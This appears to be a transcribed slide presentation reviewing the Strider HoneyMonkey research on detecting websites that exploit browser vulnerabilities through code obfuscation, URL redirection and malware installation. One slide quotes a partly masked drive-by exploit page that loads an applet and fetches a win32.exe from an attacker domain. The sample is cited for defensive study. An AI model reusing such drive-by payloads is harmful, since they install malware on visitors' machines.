Automated Web Patrol with Strider

1
Automated Web Patrol with Strider Honey
Monkeys Finding Web Sites That Exploit Browser
Vulnerabilities
AUTHORS Yi-Min Wang, Doug Beck, Xuxian Jiang,
Roussi Roussev, Chad Verbowski, Shuo Chen, and
Sam King PUBLISHED IN MICROSOFT RESEARCH
,Redmond
2
PROPOSED PROBLEM

• EMERGING ATTACK INTERNET
• ATTACKS BY MALICIOUS WEBSITE
• EXPLOIT BROWSER VULNERABILITIES
• INSTALL MALICIOUS CONTENTS
• USE OF HONEYMONKEYS FOR SOLUTION

3
BROWSER BASED VULNERABILITY
Code Obfuscation
URL redirection
Vulnerability exploitation
Malware installation
4
CODE OBFUSCATION
5
CODE OBFUSCATION

• To escape from signature based scanning
• Custom decoding routine included inside the
  script
• Unreadable long strings that are encoded and
  decoded later by the script or by the browser

6
ENCODED MALICIOUS CODE
7
DECODED MALICIOUS CODE
8
URL REDIRECTION
9
URL REDIRECTION

• PRIMARY URL TO SECONDARY URL
• PROTOCOL REDIRECTION USING HTTP 302 TEMPORARY
  REDIRECT
• HTML TAGS
• Script functions including
• window.location.replace().

10
URL REDIRECTION
http//IP address /8 chars/test2/iejp.htm
http//IP address
PRIMARY
SECONDARY
USER
11
VULNERABILITY EXPLOITATION
12
VULNERABILITY EXPLOITATION

• Malicious Website attempt to exploit multiple
  vulnerabilities
• HTML fragment multiple files from different
  URLS
• Dynamic code injection using Document.write
• Trojan downloader works after exploits
• Most attacked browser is IE

13
EXAMPLE FOR VULNERABILITY
lthtmlgtltheadgtlttitlegtlt/titlegtlt/headgtltbodygt ltstylegt
CURSOR url("http//vxxxxxxe.biz/adverts/033/spl
oit.anr") lt/stylegt ltAPPLET ARCHIVE'count.jar'
CODE'BlackBox.class' WIDTH1 HEIGHT1gt ltPARAM
NAME'url' VALUE'http//vxxxxxxe.biz/adverts/033/
win32.exe'gtlt/APPLETgt ltscriptgt Try document.write(
'ltobject data1091154510511611558
109104116109108581021051081015
8// C\fo''o.mht!''http//vxxxx''xxe.biz//adv
''erts//033//targ.ch''m/targ''et.htm
typetext/x-scriptletgtlt/ob''jectgt') catch(e)
lt/scriptgt lt/bodygtlt/htmlgt
Exploit 1
Exploit 2
Exploit 3
14
Honey Monkey Exploit Detection System

• Active client side virtual machines called
  honeypots
• Large scale, systematic and automated web patrol
• It mimics human browsing
• Different patches and different levels of
  vulnerability

15
HONEYMONKEY SYSTEM

• Stage 1 scalable mode by visiting N-URLs.
• Stage 2 perform recursive redirected analysis.
• Stage 3 scan exploit URLs using fully patched
  VMs.

16
HONEY MONKEY SYSTEM
17
TOPOLOGY GRAPH AND NODE RANKING

• Rectangular nodes represent Exploit URLs
• Arrows represent traffic redirection
• Circles represent nodes that act as an
  aggregation point for exploit pages hosted
• R is the most likely exploit provider

18
TOPOLOGY GRAPH AND NODE RANKING
19
GENERATING URL LISTS

• Generating URL LISTS
• - Suspicious URLs
• - Popular websites if attacked potentially
• attack larger population
• - Localized space websites

20
Exploit Detection Report

• Executable files created or modified outside the
  browser sandbox folders
• Processes created
• Windows registry entry created or modified
• Vulnerability exploited
• Redirect URL visited

21
Patch level statistics
22
RESULTS
23
(No Transcript)
24
ADVANTAGES

• Automatic
• Scalable
• Non-signature based approach
• Stage-wise detection

25
DISADVANTGES

• Exploiters may randomize the attack confusing the
  honey monkeys
• Exploiters were able to detect honey monkeys by
  sending dialog box
• They didnt explain about topology graphs very
  clearly

26
IMPROVEMENTS

• They need to work on accuracy
• They need more classification according
• to contents
• They should improve on avoiding
• detection by the honey monkeys